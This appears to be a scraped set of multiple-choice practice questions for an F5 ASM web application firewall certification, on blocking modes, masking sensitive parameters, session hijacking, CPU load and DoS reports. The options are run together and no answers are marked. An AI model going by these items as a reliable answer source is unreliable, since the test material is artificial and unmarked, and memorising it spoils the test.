An organization deploys a new ASM Security Policy in BLocking mode with Learning mode to Manual. All attack Signatures are set to Alarm and Block. How does the ASM Security Policy handle a request that matches an Attack Signatures? Illegal requests are logged, learning is unavailable, and they are blocked Illegal requests are logged, learning is unavailable, and they are NOT blocked Illegal requests are NOT logged, learning is available and they are blocked Illegal requests are NOT logged, learning is available and they are NOT blocked.
The password parameter in the event logs for an organization are shown in clear text. Per organization policy, the password should be masked to mitigate security concerns. What should the ASM Specialist configure in the ASM Security Policy to meet this requirement ? enable Sensitive Parameter for the username parameter enable Sensitive Parameter for the password parameter remove repsonse logging from the logging profile delete the username and password from the Parameter List.
An ASM Specialist is configuring a web application for HTTP and NO transport encryption. The web application request contains an authentication cookie in plain text. The web application is vulnerable to which type of attack? Parameter Bypass SQL Hijacking Session Bypass Session Hijacking.
An ASM module is running in production. The CPU load is above 75%. Which two actions should an ASM Specialist take to reduce the load?. (Choose two) exclude html files from inspection configure external logging exclude images from inspection configure web scraping protection configure file upload protection.
An ASM Specialist is monitoring the memory utilization of the bd process using the "top" command. On the first day, the memory increases peaking with maximum throughput of the system. On the second day, the memory utilization remains at the peak level and does NOT release back to the system. How should the ASM Specialist respond? No action is necessary provided that further increases in memory are only observed with increases in peak troughput Open a support case and create an asmqkview file for upload to iHealth and monitor / var / log / asm for errors Disable the Automatic Policy builder and monitor the ASM instance memory Set bypass_upon_asm_down system variable in Security >> Options >> Protocol >> Security and restart the bd daemon.
An ASM policy build includes the following elements: - A stress-based DoS strategy - By URL attack detection method - Request Blocking mitigation method - Heavy URLs protection is configured Some URL requests have the potential to cause stress on the server, even with a low TPS count. The ASM Specialist must confirm that the value associated with backend server response time is as close as possible to the actual value. Which report should the ASM Specialist interpret to locate the correct value? Event Correlation DoS Overview URL Latencies Session Tracking Status.
Denunciar Test